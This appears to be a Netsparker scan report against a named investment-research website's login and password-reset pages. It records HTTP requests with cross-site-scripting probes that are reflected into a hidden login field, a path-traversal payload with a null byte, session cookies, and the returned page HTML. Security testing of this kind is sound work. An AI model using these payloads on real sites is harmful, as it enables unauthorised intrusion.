User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=NAAOLMLBLNGANOMPFHFCPBJD; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=JBGBMFABGMENIJJFEHDGGCDG; Overseas+0611=Overseas+0611; RDB=c803000000000000002d2d2d2d2d2d2d2d2d2d2d2d2d2d2d000000000000c55c000000000000
Accept-Encoding: gzip, deflate

Identification Request

GET /pub/gld/?nsextt=%27%22%20ns=%20netsparker(0x003B76)%20 HTTP/1.1
Referer: http://www.stansberryresearch.com/pub/gld
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=NAAOLMLBLNGANOMPFHFCPBJD; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=JBGBMFABGMENIJJFEHDGGCDG; Overseas+0611=Overseas+0611; RDB=c803000000000000002d2d2d2d2d2d2d2d2d2d2d2d2d2d2d000000000000c55c000000000000
Accept-Encoding: gzip, deflate

Injection Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:48:19 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 12152
Content-Type: text/html
Cache-control: private



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Stansberry & Associates Investment Research</title>
<link rel="stylesheet" href="/includes/css.css" type="text/css" />
</head>

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<SCRIPT LANGUAGE="JavaScript" src="http://oascentral.stansberryresearch.com/Scripts/oas_analytics.js"></SCRIPT>
<script language="JavaScript">
var RN = new String (Math.random());
var RNS = RN.substring (2,11);
var oas_jx_sitepage = "stansberry/cover";
//<!�- Define Custom Reporting Taxonomy, format is: '&Attribute1=Value1&Attribute2=Value2' -->
var OAS_taxonomy='custom=' + oas_jx_sitepage;
var OAS_query='';
OAS_query += 'XE' + '&' + OAS_taxonomy + OAS_rdl + "&if_nt_CookieAccept=" + OAS_CA + '&XE';
// -->
</script>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="427" rowspan="2"><a href="/"><img src="/images/top_logo.gif" alt="Stansberry & Associates Investment Research" width="427" height="103" border="0"></a></td>
<td width="360" height="82" align="right" valign="middle"><a href="http://signups.harborpublishing.com/fsm/signups/signup/538.html" target="_new"><img src="/images/stars_arrow.gif" border="0"></a></td>
<td width="13" align="right" valign="middle">&nbsp;</td>
</tr>
<tr>
<td colspan="2" align="right" valign="bottom"><table width="100%" border="0" align="center" cellpadding="3" cellspacing="0" class="top_font">
<tr>
<td align="right" valign="bottom"><div align="right">Customer Service: 1-888-261-2693 | <a href="/website_overview.asp" target="_blank">Website Overview</a></div></td>
<td width="6" align="right" valign="bottom">&nbsp;</td>
</tr>
</table></td>
</tr>
</table>
<table width="798" border="0" align="center" cellpadding="0" cellspacing="0">
<tr align="left" valign="top">
<td><div align="left"><a href="/"><img src="/images/home_button.gif" alt="Home" width="70" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/editors.asp"><img src="/images/editors_button.gif" alt="Meet The Editors" width="129" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/products.asp"><img src="/images/products_btn.gif" alt="In The News" width="112" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/schedule.asp"><img src="/images/pubsched_button.gif" alt="Investment Research Publishing Schedule" width="155" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/contact.asp"><img src="/images/contact_button_main.gif" alt="Contact Us" width="159" height="38" border="0"></a></div></td>
<td><div align="left"><img src="/images/login_button.gif" alt="Subscriber Login" width="173" height="38" border="0"></div></td>
</tr>
</table><script language="javascript" type="text/javascript">
// <!CDATA[

function Submit1_onclick() {

}

// ]]>
</script>



<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>
<table width="625" border="0" cellpadding="0" cellspacing="0">
<tr>
<td><script language="JavaScript">
<!--
var oas_jx_pos = "Top";
document.write("<scr" + "ipt language=\"JavaScript\" src=\"http://oascentral.stansberryresearch.com/RealMedia/ads/adstream_jx.ads/" +
oas_jx_sitepage + "/1" + RNS + "@" + oas_jx_pos + '?' + OAS_query + "\"></scr" + "ipt>");
// -->
</script></td>
</tr>
</table></td>
<td width="200" align="left" valign="middle"><table width="100%" border="0" cellpadding="5" cellspacing="0">
<tr>
<td><!--<form action="/ICA/Default.aspx" method="post">-->
<!-- <form action="/test1/Default.aspx" method="post">-->
<form action="/ICA/default.aspx" method="post">
<table width="100%" border="0" align="right" cellpadding="2" cellspacing="0" class="top_font">
<tr>
<td >User Name:
<input name="username" type="text" id="username" size="22"></td>
</tr>
<tr>
<td>Password:
<input name="password" type="password" id="password" size="22">
<input name="ref" type="hidden" value="/secure/index/nsextt=%20netsparker(0x003B13)%20">
</td>
</tr>
<tr>
<td ><div align="left">
<p><input name="Submit" type="submit" class="top_font" value="Login" id="Submit1" onclick="return Submit1_onclick()">
<a href="/responses/forgot_password.asp">Forgot Password?</a></p>
</div></td>
</tr>
</table>
</form></td>
</tr>
</table></td>
</tr>
</table>
<TABLE id=main cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<hr align="center" width="775" size="1" noshade>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2></FONT></div>
</DIV>
</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>

<div align="center">
<P align=center class="mid_font"><B>Please Log In </B></P>
<table width="42%" border="0" cellspacing="0" cellpadding="2">
<tr align="left" valign="top">
<td><u><span class="mid_font"><FONT color=#990000><FONT
color=#666666><font color="#000000"><B>Remember:</B></font></FONT></FONT></span></u></td>
</tr>

</table>
<P align=center class="mid_font">You must have an S&amp;A subscription to access this section. <BR>
To learn more about our publications, visit our <a href="/">home page</a>. </P>
<P align=center class="mid_font">If you are already a subscriber, check your user name and password and try logging in again. <br>
Or contact customer service at 1-888-261-2693.<font color="#FF0000"><strong> </strong></font></P>
<P align=center class="mid_font">Thank you.</P>
<P align=center class="mid_font"><FONT color=#990000><B><FONT
color=#666666><BR>
</FONT></B></FONT></P>
</div>

</td>
</tr>
</table>
<TABLE cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2><img src="/images/bottom_border.gif" width="798" height="24"></FONT></div>
</DIV>
</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0" id="main">
<tr>
<td align="left" valign="top"><font color="#666666" size="1" face="Verdana, Arial, Helvetica, sans-serif">&copy;2011 Stansberry & Associates Investment Research. All Rights Reserved. Protected by copyright laws of the United States and international treaties. This website may only be used pursuant to the subscription agreement and any reproduction, copying, or redistribution (electronic or otherwise, including on the world wide web), in whole or in part, is strictly prohibited without the express written permission of Stansberry & Associates Investment Research, LLC. 1217 Saint Paul Street, Baltimore MD 21202. </font> </td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" id="main">
<tr>
<td height="21" align="left" valign="top"><div align="center">
<div align="center">
<div align="left">
<DIV align=left>
<DIV align=left>
<hr width="800" size="1" noshade>
</DIV>
</DIV>
</div>
</div>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="left" valign="top"><div align="center">
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/">Home</a> | <a href="/editors.asp">Meet the Editors</a> | <a href="/news.asp">News & Events</a> | <a href="http://www.stansberryresearch.com/pub/psi/free_reports.html" target="_blank">Media &amp; Interviews</a> | <a href="/schedule.asp">Publishing Schedule</a> | <a href="/contact.asp">Contact Us</a> | <a href="/customer_service.asp">Customer Service</a><a href="/privacy.asp"><br>
</a> <a href="/pub/pal">The S&A Alliance</a> | <a href="/pub/sug">True Wealth Alliance</a> | <a href="/pub/pwa">Private Wealth Alliance</a> <br>
<a href="/pub/digest/">S&amp;A Digest</a> | <a href="http://www.dailywealth.com" target="_blank" title="DailyWealth Investment Newsletter">DailyWealth</a> | <a href="http://www.growthstockwire.com" target="_blank" title="Growth Stock Wire Investment Newsletter">Growth Stock Wire</a> | <a href="http://www.thedailycrux.com/" target="_blank">The Daily Crux<br />
</a></font><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/privacy.asp">Privacy Policy</a><br>
</font></p>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF" id="main">
<tr>
<td height="21" align="left" valign="top"><div align="center">
<div align="center">
<div align="left">
<DIV align=left>
<DIV align=left>
<hr align="center" width="300" size="1" noshade>
</DIV>
</DIV>
</div>
</div>
</div></td>
</tr>
</table>
<table width="800" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td height="21" align="left" valign="top"><div align="center"><a href="/"><strong><img src="/images/sa_logo.gif" alt="Stansberry & Associates Investment Research" width="198" height="39" border="0"></strong></a></div></td>
</tr>
</table>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-235360-4");
pageTracker._initData();
pageTracker._trackPageview();
</script>

<!-- Google Code for S&amp;A Remarketing List -->
<script type="text/javascript">
/* <![CDATA[ */
var google_conversion_id = 1068007774;
var google_conversion_language = "en";
var google_conversion_format = "3";
var google_conversion_color = "666666";
var google_conversion_label = "AVdACPaJ0QEQ3oKi_QM";
var google_conversion_value = 0;
/* ]]> */
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
<noscript>
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1068007774/?label=AVdACPaJ0QEQ3oKi_QM&amp;guid=ON&amp;script=0"/>
</div>
</noscript>
<!-- Advertiser 'Stansberry & Associates', Include user in segment '2011 DWP - Stansberry Retargeting Pixel' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src="http://ads.bluelithium.com/pixel?id=1539896&t=2" width="1" height="1" />
<!-- End of segment tag -->
</body>
</html>

Identification Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:48:20 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 23236
Content-Type: text/html
Cache-control: private



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>S&A Prospector Commodity Investment Report</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="description" content="The S&A Prospector Investment Research Report focuses on precious metals and opportunities in the global marketplace.">
<meta name="keywords" content="coal mining, mining stock, gold mining investment, mining company research, coal mine investment, mining investing, mining, gold mining stocks, mining stock, gold mining stock report, investment newsletter">
<meta name="copyright" content=" �2008 Stansberry & Associates Investment Research ">
<meta name="ROBOTS" content="ALL">
<link rel="stylesheet" href="/includes/css.css" type="text/css" />
</head>

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<SCRIPT LANGUAGE="JavaScript" src="http://oascentral.stansberryresearch.com/Scripts/oas_analytics.js"></SCRIPT>
<script language="JavaScript">
var RN = new String (Math.random());
var RNS = RN.substring (2,11);
var oas_jx_sitepage = "stansberry/pub/gld";
//<!�- Define Custom Reporting Taxonomy, format is: '&Attribute1=Value1&Attribute2=Value2' -->
var OAS_taxonomy='custom=' + oas_jx_sitepage;
var OAS_query='';
OAS_query += 'XE' + '&' + OAS_taxonomy + OAS_rdl + "&if_nt_CookieAccept=" + OAS_CA + '&XE';
// -->
</script>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="427" rowspan="2"><a href="/"><img src="/images/top_logo.gif" alt="Stansberry & Associates Investment Research" width="427" height="103" border="0"></a></td>
<td width="360" height="82" align="right" valign="middle"><a href="http://signups.harborpublishing.com/fsm/signups/signup/538.html" target="_new"><img src="/images/stars_arrow.gif" border="0"></a></td>
<td width="13" align="right" valign="middle">&nbsp;</td>
</tr>
<tr>
<td colspan="2" align="right" valign="bottom"><table width="100%" border="0" align="center" cellpadding="3" cellspacing="0" class="top_font">
<tr>
<td align="right" valign="bottom"><div align="right">Customer Service: 1-888-261-2693 | <a href="/website_overview.asp" target="_blank">Website Overview</a></div></td>
<td width="6" align="right" valign="bottom">&nbsp;</td>
</tr>
</table></td>
</tr>
</table>
<table width="798" border="0" align="center" cellpadding="0" cellspacing="0">
<tr align="left" valign="top">
<td><div align="left"><a href="/"><img src="/images/home_button.gif" alt="Home" width="70" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/editors.asp"><img src="/images/editors_button.gif" alt="Meet The Editors" width="129" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/products.asp"><img src="/images/products_btn.gif" alt="In The News" width="112" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/schedule.asp"><img src="/images/pubsched_button.gif" alt="Investment Research Publishing Schedule" width="155" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/contact.asp"><img src="/images/contact_button_main.gif" alt="Contact Us" width="159" height="38" border="0"></a></div></td>
<td><div align="left"><img src="/images/login_button.gif" alt="Subscriber Login" width="173" height="38" border="0"></div></td>
</tr>
</table><script language="javascript" type="text/javascript">
// <!CDATA[

function Submit1_onclick() {

}

// ]]>
</script>



<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>
<table width="625" border="0" cellpadding="0" cellspacing="0">
<tr>
<td><script language="JavaScript">
<!--
var oas_jx_pos = "Top";
document.write("<scr" + "ipt language=\"JavaScript\" src=\"http://oascentral.stansberryresearch.com/RealMedia/ads/adstream_jx.ads/" +
oas_jx_sitepage + "/1" + RNS + "@" + oas_jx_pos + '?' + OAS_query + "\"></scr" + "ipt>");
// -->
</script></td>
</tr>
</table></td>
<td width="200" align="left" valign="middle"><table width="100%" border="0" cellpadding="5" cellspacing="0">
<tr>
<td><!--<form action="/ICA/Default.aspx" method="post">-->
<!-- <form action="/test1/Default.aspx" method="post">-->
<form action="/ICA/default.aspx" method="post">
<table width="100%" border="0" align="right" cellpadding="2" cellspacing="0" class="top_font">
<tr>
<td >User Name:
<input name="username" type="text" id="username" size="22"></td>
</tr>
<tr>
<td>Password:
<input name="password" type="password" id="password" size="22">
<input name="ref" type="hidden" value="/secure/index/'"--></style></script><script>netsparker(0x003B57)</script>">
</td>
</tr>
<tr>
<td ><div align="left">
<p><input name="Submit" type="submit" class="top_font" value="Login" id="Submit1" onclick="return Submit1_onclick()">
<a href="/responses/forgot_password.asp">Forgot Password?</a></p>
</div></td>
</tr>
</table>
</form></td>
</tr>
</table></td>
</tr>
</table>
<TABLE id=main cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<hr align="center" width="775" size="1" noshade>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2></FONT></div>
</DIV>
</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" align="center" cellpadding="0" cellspacing="0" id="main">
<tr>
<td width="189" align="left" valign="top" bgcolor="#FFFFFF">
<table width="183" border="0" align="left" cellpadding="1" cellspacing="0">
<tr align="left" valign="top">
<td colspan="2"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><strong><img src="/images/premium_sub_head.gif" alt="Premium Products" width="183" height="19"></strong></font></td>
</tr>
<tr align="left" valign="top">
<td width="2%">&nbsp;</td>
<td width="98%"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/trw/index.asp">True Wealth</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/psi/index.asp">Stansberry's Investment Advisory</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/oil/index.asp">S&A Resource Report</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/btr/index.asp">Advanced Income</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/twp/index.asp">The 12% Letter</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/dil/index.asp">Phase 1 Investor</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/evi/index.asp">Extreme Value</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/shr/index.asp">S&A Short Report</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/tin/index.asp">True Income</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/rem/index.asp">Retirement Millionaire</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/rtr/index.asp">Retirement Trader</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/pst/index.asp">Penny Stock Specialist</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/jrt/index.asp">Junior Resource Trader</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/gra/index.asp">S&A Grail Trader</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/tws/index.asp">True Wealth Systems</a></font></td>
</tr>

<tr align="left" valign="top">
<td width="2%"></td>
<td width="98%"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/digest/index.asp">The S&A Digest</a></font></td>
</tr>

<tr align="left" valign="top">
<td colspan="2"><img src="/images/white_fill.gif" width="1" height="1"></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.dailywealth.com" target="new window">DailyWealth</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.growthstockwire.com" target="new window">Growth Stock Wire</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.thedailycrux.com" target="new window">The Daily Crux</a></font></td>
</tr>
<tr align="left" valign="top">
<td colspan="2"><img src="/images/white_fill.gif" width="1" height="10"></td>
</tr>
<tr align="left" valign="top">
<td colspan="2"><strong><img src="/images/lifetime_sub_head.gif" alt="Lifetime Memberships" width="183" height="19"></strong></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/pal/index.asp">The S&A Alliance</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/pwa/index.asp">Private Wealth Alliance</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td>&nbsp;</td>
</tr>
</table>

</td>
<TD WIDTH="1" BGCOLOR="#cccccc"><IMG SRC="1-1.gif" WIDTH="1"
HEIGHT="1"></TD>
<td width="9" align="left" valign="top" bgcolor="#FFFFFF"> <div align="left">
</div></td>
<td width="417" align="left" valign="top" bgcolor="#FFFFFF"><table width="100%" border="0" cellspacing="0" cellpadding="2">
<tr>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><img src="/images/gld_title_sm.gif" alt="S&A Gold Report" width="370" height="34"></font></td>
</tr>
<tr>
<td align="left" valign="top"><p><font size="2"><em><font face="Verdana, Arial, Helvetica, sans-serif">S&amp;A Prospector </font></em><font face="Verdana, Arial, Helvetica, sans-serif">is a sophisticated research service in which expert geologist <a href=&quo..
- /responses/forgot_password.asp

/responses/forgot_password.asp CONFIRMED

Injection URL

http://www.stansberryresearch.com/secure/sign_in_error.asp?error=rem

Injection Request

GET /secure/sign_in_error.asp?error=rem HTTP/1.1
Referer: http://www.stansberryresearch.com/secure/rem/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=JOAOLMLBHEECILBAPACGAEKA; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=AOGBMFABDNIPCDEODGLONDCM; Overseas+0611=Overseas+0611; RDB=c803000000000000002d2d2d2d2d2d2d2d2d2d2d2d2d2d2d00000000000000000000000000
Accept-Encoding: gzip, deflate

Identification Request

POST /responses/forgot_password.asp HTTP/1.1
Referer: http://www.stansberryresearch.com/ICA/ForgotPassword.aspx
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=JOAOLMLBHEECILBAPACGAEKA; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=AOGBMFABDNIPCDEODGLONDCM; Overseas+0611=Overseas+0611; RDB=c803000000000000002d2d2d2d2d2d2d2d2d2d2d2d2d2d2d00000000000000000000000000
Content-Length: 65
Expect: 100-continue
Accept-Encoding: gzip, deflate

email_request=../../../../../../../../../../proc/self/fd/2%00.asp

Injection Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:51:04 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 12033
Content-Type: text/html
Cache-control: private



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Stansberry & Associates Investment Research - Login Error</title>
<meta http-equiv="refresh" content="7200" />
<link rel="stylesheet" href="/secure/includes/css.css" type="text/css" />

<script language="JavaScript">
<!-- Begin media
function media(URL) {
day = new Date();
id = day.getTime();
eval("page" + id + " = window.open(URL, '" + id + "', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=630,height=350');");
}
// End -->
</script>
<script language="JavaScript">
<!-- Begin Investors Atlas
function popUp(URL) {
day = new Date();
id = day.getTime();
eval("page" + id + " = window.open(URL, '" + id + "', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=790,height=450');");
}
// End -->
</script>
<script language="JavaScript">
<!-- Begin popUp1
function popUp1(URL) {
day = new Date();
id = day.getTime();
eval("page" + id + " = window.open(URL, '" + id + "', 'toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=1,width=735,height=680');");
}
function getParameter()
{
name = "err";
name = name.replace(/[[]/,"\[").replace(/[]]/,"\]");
var regexS = "[\?&]"+name+"=([^&#]*)";
var regex = new RegExp( regexS );
var results = regex.exec( window.location.href );
if( results != null )
document.getElementById("vArea").style.display = '';
}
// End -->
</script>
<script type="text/javascript">
function popup(mylink, windowname)
{
if (! window.focus) {
return true;
}

var href;

if (typeof(mylink) == 'string') {
href=mylink;
}
else {
href=mylink.href;
}

// window.open(href, windowname, 'width=908,height=618,scrollbars=yes,resizable=no,left=210,top=150');
window.open(href, windowname, 'width=490,height=645,scrollbars=no,resizable=no,left=210,top=150');
return false;
}
</script>
</head>

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" onLoad="getParameter()">
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0" class="top_font">
<tr>
<td width="331"><a href="/secure/"><img src="/secure/images/top_logo.gif
" border="0"></a></td>
<td width="469" align="right" valign="bottom" ><table width="100%" border="0" align="center" cellpadding="3" cellspacing="0" class="top_font">
<tr>
<td align="right" valign="top"><div align="right">1-888-261-2693 | <a href="/secure/faq.asp">FAQ</a> | <a href="/secure/website_overview.asp" target="_blank">Website Overview</a></div></td>
<td width="6" align="right" valign="top">&nbsp;</td>
</tr>
</table></td>
</tr>
</table>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0" class="top_font">
<tr align="left" valign="top" >
<td colspan="2"><table width="100%" border="0" cellpadding="0" cellspacing="0" background="/secure/images/light_blue_fill.gif">
<tr align="left" valign="top">
<td width="72%"><a href="/secure/"><img src="/secure/images/home_button.gif" width="70" height="38" border="0"></a><a href="/secure/editors.asp"><img src="/secure/images/editors_button.gif" width="129" height="38" border="0"></a><a href="/secure/news.asp"><img src="/secure/images/news_button.gif" width="112" height="38" border="0"></a><a href="/secure/schedule.asp"><img src="/secure/images/pubsched_button.gif" width="155" height="38" border="0"></a><a href="/secure/contact.asp"><img src="/secure/images/contact_button.gif" width="109" height="38" border="0"></a></td>
<form action="/secure/search/search_archive.asp" method="get"><td width="19%" align="left" valign="middle"><input type="text" name="zoom_query"></td>
<td width="9%" align="right"><input name="imageField" type="image" src="/secure/images/search_button.gif"></td>
</form>
</tr>
</table></td>
</tr>
<tr>
<td width="318" align="left" valign="top"><div align="left" class="top_font"><font size="3"><font size="3"><font size="2" face="Verdana, Arial, Helvetica, sans-serif">
<font size="3"><font size="3"><font size="2" face="Verdana, Arial, Helvetica, sans-serif">&nbsp;</font></font></font><font size="3"><font size="3"><font size="2" face="Verdana, Arial, Helvetica, sans-serif">&nbsp;</font></font></font> Friday, November 04, 2011
</font></font></font></div>
</td>
<td width="482"><div align="right"><a href="/secure/profile.asp"><img src="/images/my_subs_button.gif" width="144" height="22" border="0"></a><a href="/secure/account.asp"><img src="/images/account_info_button.gif" width="107" height="22" border="0"></a><a href="/secure/customer_service.asp"><img src="/images/cs_button.gif" width="121" height="22" border="0"></a><a href="/stp_ircs/logout.asp"><img src="/images/logout_button.gif" width="75" height="22" border="0"></a></div></td>
</tr>
</table>

<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td><img src="../images/pixel_white.gif" width="1" height="10"></td>
</tr>
</table>
<table width="775" align="center" cellpadding="0" cellspacing="0" id="main">
<tr>
<td width="189" align="left" valign="top" bgcolor="#FFFFFF"><table width="183" border="0" cellpadding="1" cellspacing="0">
<tr align="left" valign="top">
<td colspan="3"><img src="/images/your_subs_title.gif" width="183" height="19"></td>
</tr>

</table>
<br>
<table width="183" border="0" cellpadding="1" cellspacing="0">
<tr align="left" valign="top">
<td colspan="3"><img src="/images/learn_more_title.gif" width="183" height="19"></td>
</tr>


</table>
<br>
<table width="183" border="0" align="left" cellpadding="1" cellspacing="0">
<tr align="left" valign="top">
<td colspan="2"><strong><img src="/images/lifetime_sub_head.gif" width="183" height="19"></strong></td>
</tr>
<tr align="left" valign="top">
<td width="2%">&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.stansberryresearch.com/secure/alliance.asp" target="_blank">S&A Alliance</a></font></td>
</tr>
